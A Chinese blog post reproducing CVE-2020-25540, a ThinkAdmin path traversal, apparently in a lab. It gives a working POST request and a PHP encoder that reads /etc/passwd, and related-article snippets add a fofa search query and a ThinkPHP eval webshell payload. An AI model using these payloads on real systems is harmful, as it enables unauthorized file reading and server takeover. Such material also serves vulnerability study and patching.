thinkadmin 目录遍历 (CVE-2020-25540)

最新推荐文章于 2024-08-13 08:26:36 发布
最新推荐文章于 2024-08-13 08:26:36 发布
阅读量213 收藏
点赞数 3
分类专栏: # 目录穿越/遍历 # 文件读取 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140547866
版权

一、漏洞概述

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

二、影响范围

Thinkadmin ≤ 2020.08.03.01  

v5(任意文件读取)    

v6(列目录,任意文件读取)

三、漏洞复现

1、文件读取

/admin.html?s=admin/api.Update/node

2、文件读取+目录穿越

POST /admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1
Host: 123.58.224.8:12984
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

rules=%5B%22.%2F%22%5D

对结果进行base64解码。

3、1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s对应./../../etc/passwd的生成方法。

<?php
 $name = "../../../etc/passwd";
	for ($i = 0; $i < strlen($ename = iconv('UTF-8', 'GBK//TRANSLIT', $name)); $i++) 
	{
		echo str_pad(base_convert(ord($ename[$i]), 10, 36), 2, 0, 0);
	}
?>

在本地php环境,把脚本得到到poc.php中,访问poc.php生成。

风中追风-fzzf
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
云镜CVE-2020-25540复现
m0_46684679的博客
02-26 702
Thinkadmin v6任意文件读取漏洞
ThinkAdmin任意文件读取漏洞(CVE-2020-25540
MD@@nr丫卡uer
02-04 775
简述 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞描述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 漏洞复现 fofa搜索语句 app="ThinkAdmin" POC POST /admin/login.html/?s=admin/api.Update/node HTTP/1.1 Host: 127.0.0.1 Content-Length: 21 Cach
CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现
Jietewang的博客
12-11 3154
1. 简介 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 2. 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) 3. 环境搭建 ThinkAdmin 源码仓库:https://github.com/zoujingli/ThinkAdmin 详细安装过程请查看官方手册,环境搭建过程均来自手...
ThinkAdmin目录/任意文件读取(CVE-2020-25540 )漏洞复现及环境搭建
yzl_007的博客
08-03 2611
ThinkAdmin目录/任意文件读取(CVE-2020-25540 )漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) ThinkAdmin6环境搭建 这里我使用的是kali linux靶机来搭建环境 1、安装php环境 查看版本发现没有,按照要求
ThinkAdmin漏洞(CVE-2020-25540 )复现
玄道的网安博客
10-18 5286
简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞概述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 影响版本 ThinkAdmin版本小于 ≤ 2020.08.03.01 环境搭建 使用phpstudy进行安装 设置阿里云 Composer 代理 composer config -g repo.packagist c...
ThinkAdmin任意文件读取(CVE-2020-25540)
m0_65150886的博客
01-23 559
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。该漏洞主要是因为api中存在危险函数,且未作任何限制。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的文件。1.访问http://ip:port,出现如下页面,开始实验。获取/etc/passwd的base64编码。2.构造payload。4.base64解码。
春秋云镜 CVE-2020-25540
qq_22002773的博客
08-07 633
春秋云镜 CVE-2020-25540
sharingIsCaring:TwonkyMedia服务器7.0.11-8.5目录遍历CVE-2018-7171
05-15
(和更多) CVE-2018-7171代表TwonkyMedia Server版本7.0.11-8.5(最新版本)中的目录/文件遍历漏洞。 利用此漏洞,攻击者可以列出独立运行TwonkyMedia Server平台的设备上的所有文件。 此外,攻击者可以利用此漏洞...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-1938.zip
04-15
CVE-2020-1938:Apache Tomcat AJP协议远程代码执行漏洞】 CVE-2020-1938是Apache Tomcat服务器中的一个严重安全漏洞,该漏洞允许攻击者通过AJP(Apache JServ Protocol)接口来实现远程代码执行,从而对目标系统...
Think.PHP框架漏洞复现
m0_71300782的博客
09-13 1174
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
ThinkAdmin6部分
three_six_nine__的博客
08-06 1276
ThinkAdmin6
thinkadmin V6 Experiences
FengQingYunLing的专栏
05-03 550
全文搜索以下代码:<input class="layui-input validate-error" required="" pattern="^\S{4,}$" vali-name="登录账号" name="username" autofocus="" autocomplete="off" placeholder="登录账号">,去除 【pattern="^\S{4,}$"】正则项即可。2、单个时间属性使用:data-date-input,开始结束时间属性使用:data-date-range。
ThinkAdminCVE-2020-25540)漏洞复现
m0_48520508的博客
11-09 1907
0x00简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 非常适用快速二次开发,默认集成 微信开发组件,支持微信服务号,微信支付,支付宝支付,阿里云OSS存储,七牛云存储,本地服务器存储。,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。 0x01漏洞概述 ThinkAdmin V6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,且未作任何限制。未
ThinkPHP及Drupal漏洞合集
小小猪的博客
08-19 758
ThinkPHP漏洞 ThinkPHP2.x远程代码执行漏洞 漏洞复现 使用payload 直接访问,即可执行phpinfo(): http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D 利用该漏洞getshell,下面给出一个能够直接蚁剑(菜刀)连接的payload: /index.php?s=a/b/c/${@print(eval($_POST[1]))} ThinkPHP3.2.3 SQL注入漏.
ThinkAdmin6 任意文件读取漏洞cve-2020-25540
最新发布
Fright-Moch的博客
08-13 204
在我们日常中遇到了ThinkAdmin6任意文件读取时候,常常无法控制路径,为此我把网上的exp拆分出来。这是网上公开的exp。
mkdocs 1.2.2 内置开发服务器允许目录遍历cve-2021-40978
05-14
mkdocs是一款流行的静态网站生成器,它可以将Markdown格式的文档转换成HTML网页。不幸的是,mkdocs的1.2.2版本存在一个漏洞(CVE-2021-40978),如果使用内置的开发服务器,攻击者可以利用目录遍历漏洞来读取服务器上任何文件。这个漏洞的根本原因在于mkdocs没有正确处理用户提供的HTTP请求参数,导致攻击者可以在请求参数中注入恶意内容。 为了利用这个漏洞,攻击者需要发送一个带有特定参数的HTTP请求。参数中包含了“../”这个字符串,意味着攻击者可以访问服务器上根目录之外的文件。通过不断利用目录遍历漏洞,攻击者可以找到并读取服务器上的敏感文件,例如配置文件、密码文件等。这个漏洞对于那些使用mkdocs作为网站生成器并使用内置开发服务器的用户来说,非常严重,因为攻击者可以轻易地获取到他们的网站源码和其他敏感信息。 为了避免这个漏洞,用户可以升级到mkdocs的最新版本,或者使用其他的静态网站生成器。此外,也可以使用专门的Web服务器来代替mkdocs内置的开发服务器。在配置Web服务器时,用户应该注意避免目录遍历漏洞和其他网络安全问题。通过正确地配置Web服务器,用户可以增强他们网站的安全性,并避免潜在的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值